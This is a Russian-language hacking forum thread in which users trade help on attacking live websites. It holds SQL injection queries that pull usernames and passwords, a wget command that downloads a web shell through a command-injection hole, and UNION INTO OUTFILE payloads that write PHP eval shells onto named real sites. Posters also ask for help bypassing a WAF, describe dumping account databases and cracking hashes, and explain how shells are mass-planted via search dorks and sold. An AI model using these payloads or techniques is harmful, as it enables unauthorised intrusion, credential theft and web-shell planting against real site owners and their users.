Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    лол что?
    1. выполняй "union select database()";
    2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";
    3. Profit!
     
  2. mega_667

    mega_667 Banned

    Joined:
    3 Jul 2011
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    database() - результат DB.

    Результат одинков .... " Table 'DB.members' doesn't exist " ..
    и когда просто members и DB.members .....
     
  3. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    ни, давай ссылягу
     
  4. mega_667

    mega_667 Banned

    Joined:
    3 Jul 2011
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
     
  5. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    можно было проще:
    SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'
     
  6. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    с каких пор в таблице schemata содержатся названия таблиц?

    Code:
    select table_schema form information_schema.tables where table_name='name'
     
    1 person likes this.
  7. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    это был тонкий намёк на твою ошибку. смотри внимательнее.
     
  8. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    114
    Likes Received:
    11
    Reputations:
    0
    Есть скрипт например:
    site.ru/trololo/a.php
    Могу выполнять команды через него. Например:
    site.ru/trololo/a.php?cmd=ls -la
    Выводит лист этой диры.
    Так вот. Как залить шелл в диру корневую?
    Прав на заливку файла в папку /trololo/ нету.
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Code:
    cd ..;wget -O shell.php http://remote/shell.txt;ls -la
     
    _________________________
  10. maxfax

    maxfax New Member

    Joined:
    23 Jun 2010
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    можно сдампить базу на стопицот мульонов акков и юзать её.
    а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    1.XSS в SQL-инъекции - В парить админу, получить доступ в админку и залить шелл.
    2. Знакомые Хэш-крякеры, платные сервисы взлома хэшей.
    3. Если инъекция в UPDATE, INSERT... - Можно подменить данные в СуБДД
    4. Поискать другие уязвимости - если их использовать вместе, можно получить наилучший результат.
    5. Ну и конечно DoS ещё никто не отменял + с помощью инъекции можно узнать не только логины и хаш, а другие очень полезные данные.
     
  13. maxfax

    maxfax New Member

    Joined:
    23 Jun 2010
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Спасибо,за быстрые ответы, с вашего позволения еще один вопрос изложу:


    Один раз мне нужно было купить несколько трафистых shell-ов я обратился к одному человеку по рекомендации он мне говорит какой нужен траф и в какой зоне shell-ы нужны, я говорю траф 20к +- 5к зона de, он говорит могу за 5 дней достать shell-ов нулевок на каждом будет трафа 10-15 чел-сутки но вообщем будет траф 20к.
    Сделка так и не состоялась по моей вене!

    Меня собственно интересует такие вопросы:
    1) как люди добывают такое количество shell-лов
    2) это супер-пупер гениально умные,космические хакеры
    3) может это развод
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    находится бага (или берётся в паблике) на каком-нибудь популярном (или не популярном) движке, с помощью которой можно залить шелл. далее по доркам парсится выдача гугла на наличие сайтов на данном движке.
     
  15. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Ребятки помогите со сплоитом под пхпмуадмин:
    А именно вообще не понятна вот эта строка:

     
  16. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    эта строка закоментирована, она не играет роли сплойт рабочий.
     
  17. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Закоментиовал, настроил сплоит, получил:
    HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1
    Authorization Required

    This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.

    Дыра закрыта?
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    просто базовая авторизация стоит на папку пма и/или setup
     
    1 person likes this.
  19. l.e.a.d.e.r

    l.e.a.d.e.r New Member

    Joined:
    13 Jun 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    0
    Подскажите как правильно заливать шелл через sql-inj.
    Code:
    Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45
    
    поля 6 и 9

    _http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'<?php eval($_REQUEST[cmd]); ?>',7,8,9+from+information_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--

    не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)




    и опять 25, я что-то не так мб делаю?

    Code:
    http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
    http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'<?php eval($_GET[‘e’]) ?>',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+
    
     
    #17359 l.e.a.d.e.r, 18 Jul 2011
    Last edited: 18 Jul 2011
  20. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Помогите плиз обойти WAF

    http://www.shungitclub.ru/category_page.php?cat=21&sub=union+select+1,2,+from+mysql.user--
     
Loading...
Thread Status:
Not open for further replies.